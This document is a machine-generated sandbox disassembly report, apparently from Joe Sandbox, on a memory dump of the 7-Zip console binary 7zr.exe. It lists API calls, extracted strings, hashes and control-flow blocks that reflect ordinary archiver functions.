                            • Opcode ID: 43515da784a572333b3cef4fbb16d8775d4ef2d275ec5eac47ab4f7710be33de
                            • Instruction ID: 2788c1e905c99e3cfe822e0b3ad1996dc8c756e6b26222feb7441fca7c8b4429
                            • Opcode Fuzzy Hash: 43515da784a572333b3cef4fbb16d8775d4ef2d275ec5eac47ab4f7710be33de
                            • Instruction Fuzzy Hash: C401C076945218BBDB115BF19C49BDE7F7CAF09380F044169E445E2280D6788689C7F0

                            Control-flow Graph: function 6e3d66-6e3dfe (GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, GetLastError)
                            APIs
                            • __EH_prolog.LIBCMT ref: 006E3D6B
                            • GetCurrentProcess.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 006E3D7D
                            • OpenProcessToken.ADVAPI32(00000000,00000028,?,?,00000000,?,?,00000000,00000000,759A8E30), ref: 006E3D94
                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 006E3DB6
                            • AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,759A8E30), ref: 006E3DCB
                            • GetLastError.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 006E3DD5
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: ProcessToken$AdjustCurrentErrorH_prologLastLookupOpenPrivilegePrivilegesValue
                            • String ID: SeSecurityPrivilege
                            • API String ID: 3475889169-2333288578
                            • Opcode ID: ad68ae649582672bb2daf7346672afd80fbdbf429d08a12433c7f04845adab21
                            • Instruction ID: 69729fdb929a203dc92995b245479c54860cdc40f61e8be02cf2974861164874
                            • Opcode Fuzzy Hash: ad68ae649582672bb2daf7346672afd80fbdbf429d08a12433c7f04845adab21
                            • Instruction Fuzzy Hash: C01130B19412299FDB11EFA5DC89AFEFB7DFB08384F00452DE416E2290D7348E48CA64
                            APIs
                            • __EH_prolog.LIBCMT ref: 007181F1
                              • Part of subcall function 0071F749: _CxxThrowException.MSVCRT(?,00784A58), ref: 0071F792
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: ExceptionH_prologThrow
                            • String ID:
                            • API String ID: 461045715-3916222277
                            • Opcode ID: 19c3597da83c7d2649022c780480e729c2fde139c3c9999db6a84dafbcdbbb0b
                            • Instruction ID: da4324a9a0d2ba840483147f703b01c8846e62991029149b927d811eb3c89213
                            • Opcode Fuzzy Hash: 19c3597da83c7d2649022c780480e729c2fde139c3c9999db6a84dafbcdbbb0b
                            • Instruction Fuzzy Hash: 5A929030900249DFDF55DFA8C844BEEBBB1BF09304F244199E855AB292DB78DD85CB62
                            APIs
                            • __EH_prolog.LIBCMT ref: 006D686D
                              • Part of subcall function 006D6848: FindClose.KERNELBASE(00000000,?,006D6880), ref: 006D6853
                            • FindFirstFileW.KERNELBASE(?,-00000268,?,00000000), ref: 006D68A5
                            • FindFirstFileW.KERNELBASE(?,-00000268,00000000,?,00000000), ref: 006D68DE
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: Find$FileFirst$CloseH_prolog
                            • String ID:
                            • API String ID: 3371352514-0
                            • Opcode ID: 27c631789735c8b83569836aae8723cc390c40ab590a915973511d74ab8f6f3a
                            • Instruction ID: 5cdad4d9eb36358a10c4162f7aa781c9240da8efa95499ee2d45b621773dbd6f
                            • Opcode Fuzzy Hash: 27c631789735c8b83569836aae8723cc390c40ab590a915973511d74ab8f6f3a
                            • Instruction Fuzzy Hash: 6F11D031C00209DBCF10EF64C8559EDB77AEF54324F20422EE96197392DB328E86EB50

                            Control-flow Graph: function starting at 70a013 (fputs and _CxxThrowException paths)
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: fputs$ExceptionThrow
                            • String ID: 7zCon.sfx$Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$Files: $Folders: $OK archives: $Open Errors: $Size: $Sub items Errors: $Warnings: $`&y$p&y$N
                            • API String ID: 3665150552-3380954897
                            • Opcode ID: 0f8c811c1b92b0bd23ddd329b390ec2a867fdcf4a1a33ef1e72f0d97d01cfeba
                            • Instruction ID: 2cf2f94a9798446a9bb367b5b1956129006a5ddfb41e2dee2c1192a50b9994e7
                            • Opcode Fuzzy Hash: 0f8c811c1b92b0bd23ddd329b390ec2a867fdcf4a1a33ef1e72f0d97d01cfeba
                            • Instruction Fuzzy Hash: 30528C31D00258EFCF26EBA4C895BEDBBF6AF54300F10419EE44967291DB786A85CF15

                            Control-flow Graph

                            • Graph rendering omitted (first basic block 70a42c)
                            APIs
                            • fputs.MSVCRT(Scanning the drive for archives:), ref: 0070A43E
                              • Part of subcall function 006D1FA0: fputc.MSVCRT ref: 006D1FA7
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: fputcfputs
                            • String ID: Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$Files: $Folders: $OK archives: $Open Errors: $Scanning the drive for archives:$Size: $Warnings: $`&y$p&y$!"$N
                            • API String ID: 269475090-3867409031
                            • Opcode ID: e366acc529e3c89729b1cf218e54cc2aaeacc9868a3cd61e9bccf99a6655d0c1
                            • Instruction ID: 99297a9c700a0eb8fa5bc565ab2068ab0cc880e3dba9ee790aeb3eae33641e3e
                            • Opcode Fuzzy Hash: e366acc529e3c89729b1cf218e54cc2aaeacc9868a3cd61e9bccf99a6655d0c1
                            • Instruction Fuzzy Hash: 8A227A31E00248EFDF26EBA4C856BEDBBF6AF54300F14419EE44967291DB786A84CF15

                            Control-flow Graph

                            • Graph rendering omitted (first basic block 70993d)
                            APIs
                              • Part of subcall function 0070B5B1: fputs.MSVCRT ref: 0070B5CA
                              • Part of subcall function 0070B5B1: fputs.MSVCRT ref: 0070B5E1
                            • GetStdHandle.KERNEL32(000000F5,?,?,?,?,?,?,?), ref: 007099BD
                            • GetConsoleScreenBufferInfo.KERNELBASE(00000000,?,?,?,?,?,?), ref: 007099C4
                            • _CxxThrowException.MSVCRT(?,007855B8), ref: 00709A77
                            • _CxxThrowException.MSVCRT(?,007855B8), ref: 00709ABB
                              • Part of subcall function 006D1FB3: __EH_prolog.LIBCMT ref: 006D1FB8
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: ExceptionThrowfputs$BufferConsoleH_prologHandleInfoScreen
                            • String ID: $ || $Codecs:$Formats:$Hashers:$KSNFMGOPBELHXCc+a+m+r+$P$offset=$p&y$p&y$N
                            • API String ID: 377453556-2149508683
                            • Opcode ID: 65930a1cdc9a2a6110511d9e3570380b9b521e39bbc1c0b1716fdeed46441d31
                            • Instruction ID: 9e91618528c0277aab687de8fd06b024ca9eb02646f2f3b5c34190c5606fb17e
                            • Opcode Fuzzy Hash: 65930a1cdc9a2a6110511d9e3570380b9b521e39bbc1c0b1716fdeed46441d31
                            • Instruction Fuzzy Hash: 20226D71D00208DBDF15EFA4D885BADBBF2EF48310F20415AE545AB2D2CB399A85CF65

                            Control-flow Graph

                            • Graph rendering omitted (first basic block 6e1ade)
                            APIs
                            • __EH_prolog.LIBCMT ref: 006E1AE3
                              • Part of subcall function 006D13F5: __EH_prolog.LIBCMT ref: 006D13FA
                            • _CxxThrowException.MSVCRT(?,00786010), ref: 006E1B2D
                            • _fileno.MSVCRT ref: 006E1B3E
                            • _isatty.MSVCRT ref: 006E1B47
                            • _fileno.MSVCRT ref: 006E1B5D
                            • _isatty.MSVCRT ref: 006E1B60
                            • _fileno.MSVCRT ref: 006E1B73
                            • _CxxThrowException.MSVCRT(?,00786010), ref: 006E1CBB
                            • _CxxThrowException.MSVCRT(?,00786010), ref: 006E1DBD
                            • wcscmp.MSVCRT ref: 006E1DCA
                            • _CxxThrowException.MSVCRT(?,00786010), ref: 006E1E04
                            • _isatty.MSVCRT ref: 006E1B76
                              • Part of subcall function 006F1D73: __EH_prolog.LIBCMT ref: 006F1D78
                            • _CxxThrowException.MSVCRT(?,00786010), ref: 006E1E2C
                            • GetCurrentProcess.KERNEL32(00000000,00000000,?,Set process affinity mask: ,?), ref: 006E1E3B
                            • SetProcessAffinityMask.KERNEL32(00000000), ref: 006E1E42
                            • GetLastError.KERNEL32(?,Set process affinity mask: ,?), ref: 006E1E4C
                            Strings
                            • Set process affinity mask: , xrefs: 006E1D74
                            • Unsupported switch postfix -stm, xrefs: 006E1DAA
                            • SeLockMemoryPrivilege, xrefs: 006E1D28
                            • Unsupported switch postfix for -slp, xrefs: 006E1DF1
                            • : ERROR : , xrefs: 006E1E52
                            • Unsupported switch postfix -bb, xrefs: 006E1CA8
                            • unsupported value -stm, xrefs: 006E1E19
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: ExceptionThrow$H_prolog_fileno_isatty$Process$AffinityCurrentErrorLastMaskwcscmp
                            • String ID: : ERROR : $SeLockMemoryPrivilege$Set process affinity mask: $Unsupported switch postfix -bb$Unsupported switch postfix -stm$Unsupported switch postfix for -slp$unsupported value -stm
                            • API String ID: 1826148334-1115009270
                            • Opcode ID: d8ea1de1e20a8086a22ec1af79832e046684a32a35d00a29a8d247614567bd3f
                            • Instruction ID: 0dbd6ca666d2ee8a1ee25257c98c968ebcb84a577d1e8b45328730fdebc8821b
                            • Opcode Fuzzy Hash: d8ea1de1e20a8086a22ec1af79832e046684a32a35d00a29a8d247614567bd3f
                            • Instruction Fuzzy Hash: 1EC10571901385EFDB11EFB5C888BD9BBF2AF1A340F14849DE4899B392C778A944CB14

                            Control-flow Graph

                            • Graph rendering omitted (first basic block 708012)
                            APIs
                            • __EH_prolog.LIBCMT ref: 00708017
                            • fputs.MSVCRT ref: 0070804D
                              • Part of subcall function 00708341: __EH_prolog.LIBCMT ref: 00708346
                              • Part of subcall function 00708341: fputs.MSVCRT ref: 0070835B
                              • Part of subcall function 00708341: fputs.MSVCRT ref: 00708364
                            • fputs.MSVCRT ref: 0070807A
                              • Part of subcall function 006D1FA0: fputc.MSVCRT ref: 006D1FA7
                              • Part of subcall function 006D965D: VariantClear.OLEAUT32(?), ref: 006D967F
                            • SysFreeString.OLEAUT32(00000000), ref: 007081AA
                            • fputs.MSVCRT ref: 007081CD
                            • SysFreeString.OLEAUT32(00000000), ref: 00708267
                            • SysFreeString.OLEAUT32(00000000), ref: 007082B1
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: fputs$FreeString$H_prolog$ClearVariantfputc
                            • String ID: --$----$Path$Type$Warning: The archive is open with offset
                            • API String ID: 2889736305-3797937567
                            • Opcode ID: dd723f7054b3623ebc76285a6ef148a4a26a59ddce2933fb6feecabb1d1725c8
                            • Instruction ID: 2368724183b8e9c8b4a0dfa549599b66404492963ed644903fb6236cb452d006
                            • Opcode Fuzzy Hash: dd723f7054b3623ebc76285a6ef148a4a26a59ddce2933fb6feecabb1d1725c8
                            • Instruction Fuzzy Hash: A1918831A00609EFCF54DFA4CD84AAEB7F5FF48350F20422DE486A7291DB78A905CB61

                            Control-flow Graph

                            • Graph rendering omitted (first basic block 706766)
                            APIs
                            • __EH_prolog.LIBCMT ref: 0070676B
                            • EnterCriticalSection.KERNEL32(00792938), ref: 00706781
                            • fputs.MSVCRT ref: 0070680B
                            • LeaveCriticalSection.KERNEL32(00792938), ref: 00706944
                              • Part of subcall function 0070C7D7: fputs.MSVCRT ref: 0070C840
                            • fputs.MSVCRT ref: 00706851
                              • Part of subcall function 006D2201: fputs.MSVCRT ref: 006D221E
                            • fputs.MSVCRT ref: 007068D9
                            • fputs.MSVCRT ref: 007068F6
                              • Part of subcall function 006D1FA0: fputc.MSVCRT ref: 006D1FA7
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: fputs$CriticalSection$EnterH_prologLeavefputc
                            • String ID: v$8)y$8)y$Sub items Errors:
                            • API String ID: 2670240366-3845136838
                            • Opcode ID: 5a1b63265e49605d1fef37bdb8f6ecfe981a1ee06e5cd11b87293bb30baccb25
                            • Instruction ID: c2c84d1d30b9764ea2b52a7fe02c40a8a938c5cdf58de237cb8ff3dcf95626bb
                            • Opcode Fuzzy Hash: 5a1b63265e49605d1fef37bdb8f6ecfe981a1ee06e5cd11b87293bb30baccb25
                            • Instruction Fuzzy Hash: 0351A031900640DFCB259F64D9A4AADB7E2FF84350F54862EE19A8B2A1CB787C94CB54

                            Control-flow Graph

                            • Graph rendering omitted (first basic block 706359)
                            APIs
                            • __EH_prolog.LIBCMT ref: 0070635E
                            • fputs.MSVCRT ref: 0070645F
                              • Part of subcall function 0070C7D7: fputs.MSVCRT ref: 0070C840
                            • fputs.MSVCRT ref: 00706547
                            • fputs.MSVCRT ref: 0070665F
                            • fputs.MSVCRT ref: 007066AE
                              • Part of subcall function 006D1F91: fflush.MSVCRT ref: 006D1F93
                              • Part of subcall function 006D1FB3: __EH_prolog.LIBCMT ref: 006D1FB8
                              • Part of subcall function 006D1E40: free.MSVCRT ref: 006D1E44
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: fputs$H_prolog$fflushfree
                            • String ID: Can't allocate required memory$ERRORS:$WARNINGS:
                            • API String ID: 1750297421-1898165966
                            • Opcode ID: 3087027e9519f4b3086780b754a13b02f0a2e3d469b1421b361162512cc26a8e
                            • Instruction ID: 09e4f0294943082af54b9c3d8cafbba93ac96f41cf691ba178163b5cf4a54467
                            • Opcode Fuzzy Hash: 3087027e9519f4b3086780b754a13b02f0a2e3d469b1421b361162512cc26a8e
                            • Instruction Fuzzy Hash: 79B18E70A01701DFDB64EF60C9A5BAAB7E2FF44304F04862EE55A47292CB78A964CF54

                            Control-flow Graph

                            • Graph rendering omitted (first basic block 6d9c8f)
                            APIs
                            • GetModuleHandleA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 006D9CB3
                            • GetProcAddress.KERNEL32(00000000), ref: 006D9CBA
                            • GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 006D9CC8
                            • GlobalMemoryStatus.KERNEL32(?), ref: 006D9CFA
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: GlobalMemoryStatus$AddressHandleModuleProc
                            • String ID: $@$GlobalMemoryStatusEx$kernel32.dll
                            • API String ID: 180289352-802862622
                            • Opcode ID: 0ec75e4b8d9ce51683d965fa7a3259bcf7fa671139c224e10beb4e276d946294
                            • Instruction ID: 93f93dc198df296d4159decf8eb29dd9f68414851f2ac7115471bc2daed494d7
                            • Opcode Fuzzy Hash: 0ec75e4b8d9ce51683d965fa7a3259bcf7fa671139c224e10beb4e276d946294
                            • Instruction Fuzzy Hash: 091109B0D102099BDF20DF94D84AA9DB7F6BF08745F10441ED446EB340E778A984CB64

                            Control-flow Graph (basic blocks with their successor edges, flattened from the graph figure; the Executed / Not Executed colouring is not recoverable from the text)
                            • 1028 71f1b2-71f1ce call 76fb10, call 6e1168 -> 1032
                            • 1032 71f1d3-71f1d5 -> 1033, 1034
                            • 1033 71f1db-71f1e4 call 71f3e4 -> 1037, 1038
                            • 1034 71f36a-71f378 (no successors listed)
                            • 1037 71f1e6-71f1e8 -> 1034
                            • 1038 71f1ed-71f1f2 -> 1039, 1040
                            • 1039 71f203-71f21a -> 1043, 1044
                            • 1040 71f1f4-71f1f9 -> 1039, 1041
                            • 1041 71f1fb-71f1fe -> 1034
                            • 1043 71f231-71f248 memcpy -> 1045
                            • 1044 71f21c-71f22c _CxxThrowException -> 1043
                            • 1045 71f24c-71f257 -> 1046, 1047
                            • 1046 71f259 -> 1047
                            • 1047 71f25c-71f25e -> 1048, 1049
                            • 1048 71f281-71f299 -> 1057, 1058
                            • 1049 71f260-71f26f -> 1050, 1051
                            • 1050 71f271 -> 1052, 1053
                            • 1051 71f279-71f27b -> 1048, 1054
                            • 1052 71f273-71f275 -> 1051, 1053
                            • 1053 71f277 -> 1051
                            • 1054 71f315-71f318 -> 1056
                            • 1056 71f357-71f368 -> 1034
                            • 1057 71f311-71f313 -> 1056
                            • 1058 71f29b-71f2a0 -> 1054, 1059
                            • 1059 71f2a2-71f2b5 call 71f37b -> 1063, 1064
                            • 1063 71f2f0-71f30c memmove -> 1045
                            • 1064 71f2b7-71f2cf call 76e1a0 -> 1067, 1068
                            • 1067 71f2d1-71f2eb call 71f37b -> 1064, 1072
                            • 1068 71f31a-71f355 memcpy -> 1056
                            • 1072 71f2ed -> 1063
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: Cx$Cx
                            • API String ID: 3519838083-1521322968
                            • Opcode ID: 0a1d0742715ad0f44ff3aef5a36586077e80ef5885b6d2156300fdd5c6e021e6
                            • Instruction ID: ff6b26c7189aab87b3df2131f2252a3e0b8136396cb9a29dc095fd7a46ee44e9
                            • Opcode Fuzzy Hash: 0a1d0742715ad0f44ff3aef5a36586077e80ef5885b6d2156300fdd5c6e021e6
                            • Instruction Fuzzy Hash: D5519376A003099FDB14DFA8C8C4BFEB3B5FF88354F148429E911AB281D778AD458B60

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: _initterm$__getmainargs__p___initenv__p__commode__p__fmode__set_app_type
                            • String ID:
                            • API String ID: 4012487245-0
                            • Opcode ID: b12c154c2e3866b65399520ae56aa64e94b7b1ea79474865b839280aa29d765d
                            • Instruction ID: 1fc0190605d1e4d13a2ba6cc6e1ed6405fe2273060635a8d472f8beaa49d39ae
                            • Opcode Fuzzy Hash: b12c154c2e3866b65399520ae56aa64e94b7b1ea79474865b839280aa29d765d
                            • Instruction Fuzzy Hash: FE215EB5900708EFCB01AFA4DC4AAA97BB8FB0D764F00822AF515A22A2C77C5441CB65

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: _initterm$FilterXcpt__getmainargs__p___initenv__setusermatherr_controlfpexit
                            • String ID:
                            • API String ID: 279829931-0
                            • Opcode ID: 68a443ca9ee8fdfc172fda8305512f203157d579d589b593f16f9100d0c6747c
                            • Instruction ID: 19c9ce2ba3245d3c7330d995c4faef99261e5fce0e509f885cdaf450a7904271
                            • Opcode Fuzzy Hash: 68a443ca9ee8fdfc172fda8305512f203157d579d589b593f16f9100d0c6747c
                            • Instruction Fuzzy Hash: BA010CB5940308EFDF05ABE4DC4ACEE7779FB0C354B10815AF509B2262DA7D9451CB64

                            Control-flow Graph

                            APIs
                            • __EH_prolog.LIBCMT ref: 006F185D
                              • Part of subcall function 006F021A: __EH_prolog.LIBCMT ref: 006F021F
                              • Part of subcall function 006F062E: __EH_prolog.LIBCMT ref: 006F0633
                            • _CxxThrowException.MSVCRT(?,00786010), ref: 006F1961
                              • Part of subcall function 006F1AA5: __EH_prolog.LIBCMT ref: 006F1AAA
                            Strings
                            • Duplicate archive path:, xrefs: 006F1A8D
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog$ExceptionThrow
                            • String ID: Duplicate archive path:
                            • API String ID: 2366012087-4000988232
                            • Opcode ID: f2ddcd4c9a587acf1021036b809659586102da18c3f4b473f2bb3bca79cc5cc3
                            • Instruction ID: 9dfe6c05fc003450061bd707295314765643bc4651d6786c3eee734635b453c9
                            • Opcode Fuzzy Hash: f2ddcd4c9a587acf1021036b809659586102da18c3f4b473f2bb3bca79cc5cc3
                            • Instruction Fuzzy Hash: ED81AF31D00248EFCF15EFA4D495AEDB7B2AF0A350F1040AEE51677292DB74AE05CB64

                            Control-flow Graph (graph figure not recoverable from the text: nodes 1563-1762 cover the function from 6d6c72 to 6d715f, entry block 6d6c72-6d6c8e call 76fb10, return block 6d7118-6d7126; blocks that call Windows APIs: 6d6ec7-6d6ec9 SetLastError, 6d7099-6d70af wcscmp; all other blocks are internal calls and branches)
                            APIs
                            • __EH_prolog.LIBCMT ref: 006D6C77
                            • SetLastError.KERNEL32(00000002,-00000050,0000000F,-00000038,:$DATA,?,00000000,?), ref: 006D6EC9
                              • Part of subcall function 006D6C72: wcscmp.MSVCRT ref: 006D70A5
                              • Part of subcall function 006D6BF5: __EH_prolog.LIBCMT ref: 006D6BFA
